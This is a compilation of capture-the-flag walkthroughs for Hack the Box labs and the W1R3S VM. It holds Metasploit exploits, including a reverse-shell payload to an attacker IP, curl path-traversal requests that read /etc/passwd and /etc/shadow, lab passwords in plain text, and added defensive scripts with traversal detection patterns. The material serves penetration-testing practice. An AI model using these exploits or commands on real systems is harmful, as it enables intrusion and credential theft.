Hack the Box Challenge: Grandpa Walkthrough


Hello friends!! Today we are going to solve another CTF challenge, “Grandpa”, which is a lab presented by Hack the Box for online penetration-testing practice according to your experience level. They have a collection of vulnerable labs as challenges from beginner to expert level. HTB splits its labs into two groups, Active and Retired; since we can’t submit a write-up of any Active lab, we have chosen the retired Grandpa lab.
Level: Beginner
Task: find the user.txt and root.txt files on the victim’s machine.

Let’s begin the Game!!

Since these labs are available online they have static IPs, and the IP of Grandpa is 10.10.10.14, so let’s begin with nmap port enumeration.
nmap -p- -sV 10.10.10.14

From the nmap result I found the following information.
Open port: 80 for HTTP
Service version: Microsoft IIS httpd 6.0
OS: Windows machine.




Then I used searchsploit for IIS 6.0 and found a remote buffer overflow vulnerability in Microsoft IIS httpd 6.0; you can also look this exploit up on Google.




Then I ran the msfconsole command in a terminal to load the Metasploit framework and used the Microsoft IIS WebDAV ScStoragePathFromUrl Overflow module to exploit the target machine.
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.14 (target IP)
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.3 (attacker IP)
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lport 4444
msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run




Terrific!! I have got unauthorized access to the victim’s command shell through session 1, as shown in the image below.
Then I ran the getuid command to identify the user ID and current process, but it failed because of the limited shell access we have in session 1, so now we need privilege escalation.
For that, background your current meterpreter shell and move on to post exploitation.





Then I ran the post-exploitation module “Multi Recon Local Exploit Suggester”, which suggests local meterpreter exploits that can be used for further exploitation. The exploits are recommended based on the architecture and platform on which the user has a shell open, as well as the exploits available in meterpreter.

use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
msf post(multi/recon/local_exploit_suggester) > run

Wonderful!! The Exploit Suggester truly proved itself by suggesting other exploits to which the target is vulnerable. So now we will go with the last option, as highlighted in the image.




At this point, use the pprFlattenRec Local Privilege Escalation module to gain unauthorized access again, but this time as a privileged user.
use exploit/windows/local/ppr_flatten_rec
msf exploit(windows/local/ppr_flatten_rec) > set lhost 10.10.14.3
msf exploit(windows/local/ppr_flatten_rec) > set lport 4455
msf exploit(windows/local/ppr_flatten_rec) > run

Nice!! It worked and we got meterpreter session 2 as the SYSTEM user, as you can check in the image below.
Meterpreter > getuid




Now let’s complete this task by searching for the user.txt and root.txt flags, which are hidden somewhere inside a directory.
Meterpreter > shell
Inside C:\Documents and Settings\Harry\Desktop I found the user.txt file and used the type “file name” command to read it.
cd Desktop
type user.txt

Great!! We got our 1st flag successfully.




Inside C:\Documents and Settings\Administrator\Desktop I found the root.txt file and used the type “file name” command to read it.
cd Desktop
type root.txt

Great!! We got our 2nd flag successfully.

Breaching this lab was an interesting and enjoyable moment for me. It takes less time if you are aware of the proper Metasploit exploits. Therefore I will give all the glory to Metasploit for making this challenge easy for me.
Happy Hacking!!



Hack the Box Challenge: Blue Walkthrough


Hello friends!! Today we are going to solve another CTF challenge, “Blue”, which is a lab presented by Hack the Box for online penetration-testing practice according to your experience level. They have a collection of vulnerable labs as challenges from beginner to expert level. HTB splits its labs into two groups, Active and Retired; since we can’t submit a write-up of any Active lab, we have chosen the retired Blue lab.
Level: Beginner
Task: find the user.txt and root.txt files on the victim’s machine.

Let’s begin the Game!!

Since these labs are available online they have static IPs, and the IP of Blue is 10.10.10.40, so let’s begin with nmap port enumeration.
nmap -sV 10.10.10.40 --open
From the image given below, you can observe that we found many open ports, and ports 137, 139 and 445 indicate that it is a Windows machine.
When I extracted the complete nmap result I found the following details:

· OS: Windows 7 Professional
· Computer name: haris-pc
· NetBIOS computer name: haris-pc
· SMB version: 2.02

Great!! From this result I can conclude that the username may be “haris”; moreover, this SMB service can be exploited through the EternalBlue vulnerability (MS17-010).
Let’s confirm the EternalBlue vulnerability on the victim’s system using an nmap script.
nmap --script vuln -p445 10.10.10.40
Awesome!! The victim’s machine is vulnerable to the EternalBlue exploit.
Then I ran the msfconsole command in a terminal to load the Metasploit framework and used the EternalBlue module to exploit the target machine.
use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40
msf exploit(windows/smb/ms17_010_eternalblue) > run
Terrific!! I have got unauthorized access to the victim’s command shell through session 1, as shown in the image below.
Inside C:\Users\haris\Desktop I found the user.txt file and used the type “file name” command to read it.
cd Desktop
type user.txt
Great!! We got our 1st flag successfully.
Inside C:\Users\Administrator\Desktop I found the root.txt file and used the type “file name” command to read it.
cd Desktop
type root.txt

Great!! We got our 2nd flag successfully.

It was a very easy challenge for those candidates who have a little knowledge of vulnerability analysis.
Happy Hacking!!



Hack the Box Challenge: Lame Walkthrough


Hello friends!! Today we are going to solve another CTF challenge, “Lame”, which is a lab presented by Hack the Box for online penetration-testing practice according to your experience level. They have a collection of vulnerable labs as challenges from beginner to expert level. HTB splits its labs into two groups, Active and Retired; since we can’t submit a write-up of any Active lab, we have chosen the retired Lame lab.
Level: Beginner
Task: find the user.txt and root.txt files on the victim’s machine.

Let’s begin the Game!!

Since these labs are available online they have static IPs, and the IP of Lame is 10.10.10.3, so let’s begin with nmap port enumeration.
nmap -sV 10.10.10.3
From the image given below, you can observe that we found many open ports, such as 21 for FTP, 22 for SSH, and 139 and 445 for the Samba service, and we also got a hint that the OS platform may be Unix or Linux.
From the nmap result we saw that Samba smbd 3.x is running on the victim’s machine, so next I searched Google for any exploit related to this service.

Gratefully, Google gave me a hint in its 2nd link, which pointed to Exploit DB.
Then I ran the msfconsole command in a terminal to load the Metasploit framework and used the Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution module to exploit the target machine.
use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > set rhost 10.10.10.3
msf exploit(multi/samba/usermap_script) > exploit
Terrific!! I have got unauthorized access to the victim’s command shell through session 1, as shown in the image below.
I upgraded the command shell to a meterpreter shell by executing the following command.
sessions -u 1
Inside the path /home/makis I found the user.txt file and used the cat “file name” command to read it.
cd home
ls
cd makis
ls
cat user.txt
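The Samba module used above works because the affected versions pass the SMB username into an external command configured with the smb.conf option username map script. For a defender, the two things worth checking on a Samba host are therefore whether that option is set at all and whether the installed version falls in the affected range the exploit title names (3.0.20 up to, but not including, 3.0.25rc3). The following audit script is an added example written for this walkthrough; it is not part of the original post or of Samba. The smb.conf text and the version string it checks are constructed samples, and the version parsing follows the simple major.minor.patch[rcN] pattern that the title uses.

```python
import re

# Constructed smb.conf for illustration only; not the lab's real configuration.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   security = user
   ; legacy hook that an administrator left enabled
   username map script = /etc/samba/scripts/mapusers.sh

[homes]
   comment = Home Directories
   browseable = no
"""


def parse_smb_conf(text):
    """Minimal smb.conf reader: {section: {option: value}}, lower-cased keys, '#'/';' comments skipped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def parse_version(s):
    """'3.0.25rc3' -> (3, 0, 25, 0, 3); '3.0.25' -> (3, 0, 25, 1, 0).
    A release candidate sorts before the final release of the same number.
    Distribution suffixes such as '3.0.20-Debian' are dropped before parsing."""
    core = s.split("-")[0].split("_")[0]
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", core)
    if not m:
        raise ValueError(f"unrecognised Samba version string: {s!r}")
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), 0 if rc else 1, int(rc or 0))


# Affected range as stated in the exploit title: 3.0.20 <= version < 3.0.25rc3
VULN_LOW, VULN_HIGH = parse_version("3.0.20"), parse_version("3.0.25rc3")


def is_vulnerable_version(version_string):
    return VULN_LOW <= parse_version(version_string) < VULN_HIGH


def audit(conf_text, version_string):
    """Return a list of human-readable findings; empty list means nothing flagged."""
    findings = []
    glob = parse_smb_conf(conf_text).get("global", {})
    if "username map script" in glob:
        findings.append(
            "[global] 'username map script' is set to %r: smbd runs this command with the "
            "client-supplied username, so remove it unless it is strictly required."
            % glob["username map script"]
        )
    if is_vulnerable_version(version_string):
        findings.append(
            "Samba %s is within the affected range 3.0.20 <= v < 3.0.25rc3; upgrade."
            % version_string
        )
    return findings


if __name__ == "__main__":
    # The version string is what 'smbd --version' prints after the word 'Version' (constructed here).
    for f in audit(SAMPLE_SMB_CONF, "3.0.20-Debian"):
        print("FINDING:", f)
```

On a real host you would feed it the contents of /etc/samba/smb.conf and the version from smbd --version; both findings must be clear (option absent, version outside the range) for the host to be considered safe from this particular issue.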

Great!! We got our 1st flag successfully.

Inside the path /root I found the root.txt file and used the cat “file name” command to read it.

cd root
ls
cat root.txt

Great!! We got our 2nd flag successfully.

It will be a very stress-free challenge for those candidates who have a little knowledge of vulnerability analysis.

Happy Hacking!!

Hack the Box Challenge: Blocky Walkthrough


Hello friends!! Today we are going to solve another CTF challenge, “Blocky”, which is available online for those who want to improve their penetration-testing and black-box testing skills. Blocky is a retired vulnerable lab presented by Hack the Box for online penetration-testing practice according to your experience level; they have a collection of vulnerable labs as challenges from beginner to expert level. We are going to start a new Hack the Box series beginning with Blocky, which is designed for beginners.
Since these labs are available online they have static IPs, and the IP of Blocky is 10.10.10.37, so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.37
From the image given below, you can observe that we found ports 21, 22 and 80 open on the victim’s network.


Knowing that port 80 is open on the victim’s network, I preferred to open its IP in the browser, but didn’t get any remarkable clue for the next step on its welcome page.




Next we used the dirb tool from Kali to enumerate directories and found some important ones, such as /phpmyadmin, /wp-admin and /plugin/files, which you can confirm from the image below.

dirb http://10.10.10.37/



After browsing many directories I found /plugin/files a bit interesting, opening the following URL in the browser.
http://10.10.10.37/plugin/files
From the image given below you can observe that it shows two jar files. Let’s download the blockycore.jar file and then move on to decompiling it.


Using an online decompiler I decompiled the blockycore.jar file and found something very interesting in it. It contains the login credentials sqluser and sqlpass, as highlighted in the image below.



Then I browsed to http://10.10.10.37/phpmyadmin and logged into the phpMyAdmin server using the above credentials, root : 8YsqfCTnvxAUeduzjNSXe22.
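The root cause on Blocky is a credential compiled into a jar that anyone can download, so the fix belongs on the build side: scan shipped artifacts (or their decompiled source) for string constants that look like secrets before they are published. The script below is an added example written for this walkthrough, not code from the original post or from the Blocky project. It runs over a constructed Java snippet standing in for decompiler output (the field names follow the page, the password value is made up), flags assignments whose variable name looks credential-related, and separately flags long high-entropy literals, which catches secrets even when the variable is innocuously named.

```python
import math
import re

# Constructed stand-in for decompiled output; the password value is invented for this example.
SAMPLE_DECOMPILED = """\
public class BlockyCore {
    public String sqlHost = "localhost";
    public String sqlUser = "root";
    public String sqlPass = "Xk9vQ2mLp7RtZ4wHb1Yc";
    public static final String VERSION = "1.0.0";
    public String greeting = "Hello world";
}
"""

# identifier = "literal"  (Java, Kotlin, C#, JS all look like this after decompilation)
ASSIGN_RE = re.compile(r'\b(?P<name>[A-Za-z_]\w*)\s*=\s*"(?P<value>[^"]*)"')
# variable names that usually hold credentials
CRED_NAME_RE = re.compile(r"(pass|pwd|secret|token|api_?key|user)", re.IGNORECASE)
ENTROPY_THRESHOLD = 3.5   # bits per character; natural-language strings sit well below this
MIN_SECRET_LEN = 16       # short literals are too noisy for the entropy heuristic


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for empty or single-symbol strings)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def mask(value):
    """Keep the first two characters so a reviewer can recognise the value without it being printed."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "**"


def scan_source(text):
    """Return findings as dicts: line number, identifier, masked value and the reasons it was flagged."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in ASSIGN_RE.finditer(line):
            name, value = m.group("name"), m.group("value")
            reasons = []
            if CRED_NAME_RE.search(name):
                reasons.append("credential-like-name")
            if len(value) >= MIN_SECRET_LEN and shannon_entropy(value) >= ENTROPY_THRESHOLD:
                reasons.append("high-entropy")
            if reasons:
                findings.append({"line": lineno, "name": name, "masked": mask(value), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_source(SAMPLE_DECOMPILED):
        print(f"line {f['line']}: {f['name']} = {f['masked']}  [{', '.join(f['reasons'])}]")
```

For a compiled jar you would first run a decompiler (or, more crudely, strings on the extracted .class files) and feed that text to scan_source; wiring the check into CI so the build fails on any finding is what prevents a secret from reaching a public download directory in the first place.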




Then I opened the wordpress database to take a username from there, and I found a user login, Notch, with user ID 1.




Now I tried to access a shell on the victim’s system through SSH, since port 22 is open as per the nmap result and I had also found a username, so I opened a new terminal in Kali and executed the following command to connect to the target over SSH.
ssh notch@10.10.10.37
For the password I tried the password found in the jar file above and got a successful login to the victim’s shell.
id
From the id result I came to know that Notch is the first user of the system.




Executing the sudo -l command tells us that user Notch has full privileges on this machine.




Then I moved on to root access using the same password as before, and again I got root access successfully.
sudo su
Then inside its home directory I found the user.txt file and used the cat command to read it.
ls
cat user.txt

Gracefully!! We found the 1st flag of this lab in user.txt.




Then I moved into the root directory, where I found root.txt, and again used the cat command to read it.
cd root
ls
cat root.txt
Great!!! We completed this challenge by capturing the 2nd flag in the root.txt file.


Hack the W1R3S.inc VM (CTF Challenge)


Hello friends! Today we are going to take on another CTF challenge, known as W1R3S.inc. The credit for making this VM goes to “SpecterWires”, and it is another capture-the-flag challenge in which our goal is to gain root access and capture the flag to complete the challenge. You can download this VM here.
Let’s Breach!!!

Let’s start by getting to know the IP of the VM (here I have it at 192.168.1.106, but you will have to find your own).
netdiscover




Now let’s move on to enumeration to identify the running services and open ports of the victim’s machine using the most popular tool, Nmap.
nmap -p- -A 192.168.1.106 --open

Awesome!! Nmap has done a remarkable job by dumping the details of the services running on the open ports 21, 22 and 80.




Knowing that port 80 is open on the victim’s network, I preferred to open its IP in the browser, but didn’t get any clue for the next step on its home page.




Next we used the dirb tool from Kali to enumerate directories and found some important ones, such as /administrator, /installation and /wordpress.
dirb http://192.168.1.106/




So next I decided to open http://192.168.1.106/administrator/installation in the browser and received the installation page shown in the image below. Moreover, I noticed that the author has used Cuppa CMS.




With the help of Google I checked for any exploit related to Cuppa CMS, and in the Google search results I found exploit 25971 in the first link.




This exploit points to a Cuppa CMS file inclusion vulnerability. The exploit gives a hint for exploiting the LFI or RFI vulnerability; taking a little help from the highlighted hint, let’s try to exploit our victim.




According to our situation we need to put the malicious payload in the URL as http://192.168.1.106/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd to exploit the LFI vulnerability.
Sadly!! Again I didn’t get anything except the following blank configuration page.




After wasting a lot of time in the browser I decided to use curl to exploit the LFI vulnerability and obtain the /etc/passwd file.
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.1.106/administrator/alerts/alertConfigField.php
When I executed the above command to retrieve the /etc/passwd file, it worked successfully and I found the first username, “w1r3s”.




Then I executed the command below to obtain the shadow file using the same process.
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.1.106/administrator/alerts/alertConfigField.php
I successfully found the salted password hash of user w1r3s, as shown in the image below. Then I copied this hash into a text file, pass.txt, for cracking with John the Ripper.
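Two details in the LFI steps above matter to whoever is watching this server: the browser attempt sends the traversal in the query string, which lands in the access log, while the curl --data-urlencode attempt sends it as a POST body, which a default access log never records. The detector below is an added example written for this walkthrough (not part of the original post or of Cuppa CMS). It runs over constructed Apache combined-format log lines, percent-decodes every query parameter repeatedly so double-encoded ../ sequences are caught, flags traversal or well-known sensitive file names, and then flags any later POST to a path that has already drawn a traversal attempt, since that body cannot be inspected from this log alone.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache "combined" access-log lines for illustration; not from the original post.
SAMPLE_LOG = """\
192.168.1.50 - - [10/Mar/2018:10:01:02 +0000] "GET /administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.168.1.50 - - [10/Mar/2018:10:01:09 +0000] "GET /administrator/alerts/alertConfigField.php?urlConfig=%252e%252e%252fetc%252fshadow HTTP/1.1" 200 1024 "-" "curl/7.58.0"
192.168.1.50 - - [10/Mar/2018:10:01:15 +0000] "POST /administrator/alerts/alertConfigField.php HTTP/1.1" 200 2048 "-" "curl/7.58.0"
192.168.1.51 - - [10/Mar/2018:10:02:00 +0000] "GET /administrator/index.php?page=dashboard HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# a ".." path component, with either slash style, anywhere in the decoded value
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "/proc/self/environ", "win.ini")


def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so %252e%252e%252f (double encoding) becomes ../ ."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_params(query):
    """Return (param_name, decoded_value) for the first suspicious parameter, else None."""
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw)
        if TRAVERSAL_RE.search(value) or any(s in value.lower() for s in SENSITIVE_FILES):
            return name, value
    return None


def scan_log(text):
    """Walk the log in order; traversal hits mark their path so later POSTs to it are surfaced too."""
    findings, flagged_paths = [], set()
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        ip, method, target = m.group("ip"), m.group("method"), m.group("target")
        parts = urlsplit(target)
        hit = check_params(parts.query)
        if hit:
            flagged_paths.add(parts.path)
            findings.append({"line": lineno, "ip": ip, "method": method, "path": parts.path,
                             "param": hit[0], "value": hit[1], "reason": "traversal-in-query"})
        elif method == "POST" and parts.path in flagged_paths:
            # body is not in the access log; this needs the WAF/mod_security or application log
            findings.append({"line": lineno, "ip": ip, "method": method, "path": parts.path,
                             "param": None, "value": None, "reason": "post-to-flagged-path"})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['ip']} {f['method']} {f['path']} -> {f['reason']}"
              + (f" ({f['param']}={f['value']})" if f["param"] else ""))
```

The real mitigation is in the application (never pass a request parameter to include/require without a whitelist), but until that is fixed this gives a defender a way to spot the attempt, and the post-to-flagged-path finding is the reminder that request bodies have to be logged somewhere else to see the second half of the activity.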




Next I used John the Ripper to crack pass.txt, and in the image given below you can observe the highlighted text “computer” as the plaintext password.
Hence we found username: w1r3s and password: computer.




If you remember the nmap output, it showed that port 22 is open for SSH. We have also grabbed the username and password, so without wasting time let’s log in over SSH using the above credentials, username w1r3s and password computer.
ssh w1r3s@192.168.1.106
Wonderful!! We have successfully accessed a pts shell on the victim’s system through SSH.
id
lsb_release -a




Since the author has set two challenges, i.e. (i) take root access and (ii) capture the flag, let’s take root access through the sudo -i command as shown in the image below.
Congratulations!! We got root login successfully.

To capture the flag I looked through all the directories and found the flag.txt file. With the help of the cat command I successfully captured the flag and completed all the challenges of this VM.
ls -la
cat flag.txt

Solving the challenge in this lab is not that hectic, so it is a good task for beginners.